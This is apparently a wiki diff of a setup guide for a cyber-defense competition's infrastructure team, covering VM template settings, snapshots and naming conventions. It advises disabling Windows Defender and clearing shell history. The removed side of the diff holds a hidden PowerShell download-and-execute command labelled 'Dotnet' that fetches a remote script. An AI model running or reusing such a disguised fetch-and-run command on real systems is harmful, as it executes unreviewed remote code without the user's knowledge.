Differences
This shows you the differences between two versions of the page.
| Both sides previous revision Previous revision Next revision | Previous revision | ||
|
guides:lockdown_black_team [2019/10/27 20:59] aibekzhy |
guides:lockdown_black_team [2021/04/27 02:57] (current) aibekzhy |
||
|---|---|---|---|
| Line 18: | Line 18: | ||
| - Copy Paste Enabled | - Copy Paste Enabled | ||
| - Graphics to support Full HD/Automatic Graphics Detection | - Graphics to support Full HD/Automatic Graphics Detection | ||
| + | - Ensure time Synchronized | ||
| + | - Potentially disable DHCP | ||
| + | - Make sure the best NIC type is attached "vmxnet3" -> "vmxnet2" -> etc | ||
| * Linux: | * Linux: | ||
| Line 23: | Line 26: | ||
| - Depending on how old ansible is, try to install python2 and python3 | - Depending on how old ansible is, try to install python2 and python3 | ||
| - SSH server (installed, enabled, running) | - SSH server (installed, enabled, running) | ||
| - | - Ubuntu specific: | + | - Decrease swappiness to 10 |
| + | - Python2 and python3 installed (less headache if you are using ansible) | ||
| + | - Ubuntu-specific: | ||
| - Ensure networkd is a renderer | - Ensure networkd is a renderer | ||
| + | - Install resolvconf to configure DNS on 18.* | ||
| - Fedora specific: | - Fedora specific: | ||
| - Depending on implementation look into installing network-scripts | - Depending on implementation look into installing network-scripts | ||
| - Install libselinux-python | - Install libselinux-python | ||
| - Ensure Release of child OSes match supported OS: https://kb.vmware.com/s/article/1005870 | - Ensure Release of child OSes match supported OS: https://kb.vmware.com/s/article/1005870 | ||
| + | |||
| + | |||
| * Windows: | * Windows: | ||
| - VMWare tools | - VMWare tools | ||
| Line 36: | Line 44: | ||
| - Ensure that Windows Remote Management service is started Automatically | - Ensure that Windows Remote Management service is started Automatically | ||
| - Enable Ping via Firewall (Allow ICMP Packets) | - Enable Ping via Firewall (Allow ICMP Packets) | ||
| - | - Disable Windows Defender (Registry/GPO) | + | - Disable/Uninstall Windows Defender (Registry/GPO) |
| - Disable Windows Updates (Registry/GPO/Services) | - Disable Windows Updates (Registry/GPO/Services) | ||
| + | - Make sure ansible deployment has a unique AD_Name for every host, to avoid hostname collisions | ||
| + | - Allow remote connections to the computer, under "Remote" tab of System Properties | ||
| - Ensure Sleep is disabled | - Ensure Sleep is disabled | ||
| - | - Try to Debloat as much as possible: https://github.com/Sycnex/Windows10Debloater | + | - Try to Debloat as much as possible: https://github.com/Sycnex/Windows10Debloater (Might not worth it) |
| + | - Sometimes windows may start randomly shutting down. In which case please look into the following | ||
| + | - Use High-performance Battery Profile | ||
| + | - Windows 10 Enterprise specific: | ||
| + | - Make sure when Template is deployed, it has an Ethernet Access. If it doesn't have one, it will reboot endlessly: https://superuser.com/questions/933754/why-does-windows-10-shut-down-hourly-with-initiated-power-off-on-behalf-of-nt-a | ||
| * Pfsense: | * Pfsense: | ||
| Line 50: | Line 65: | ||
| * Ensure you clean up the history of all applications/shells | * Ensure you clean up the history of all applications/shells | ||
| * Ensure you take a snapshot of the entire infrastructure after deploying your malware | * Ensure you take a snapshot of the entire infrastructure after deploying your malware | ||
| + | * Manually login to every VM after the red team is done pre-staging. This ensures that everything is still operational, and in addition, it loads a lot of things from disk to memory, which ensures a smoother experience at the start of the competition. | ||
| + | * If the performance of VMs is very slow, try to lower the number of snapshots or use the snapshots that were created are no longer than a day before the competition. | ||
| Line 65: | Line 82: | ||
| Things that are typically requested: | Things that are typically requested: | ||
| - | * Windows: Dotnet (powershell.exe -Sta -Nop -w hidden -Command "IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/temppp/master/builder.ps1?token=AIVA5C62REQKCZAXPVLPOUS5TAWXC' -UseBasicParsing)") | + | * Windows: |
| + | * Dotnet https://dotnet.microsoft.com/download | ||
| + | * Python executables | ||
| * C2 Servers | * C2 Servers | ||
| + | * | ||
| ===== Naming Conventions ===== | ===== Naming Conventions ===== | ||
| Line 102: | Line 122: | ||
| **Note: %02d just represents a padded 0.** | **Note: %02d just represents a padded 0.** | ||
| + | |||
| + | Aibek to Aibek: PLEASE FIX ANSIBLE RELATIVE PATHING | ||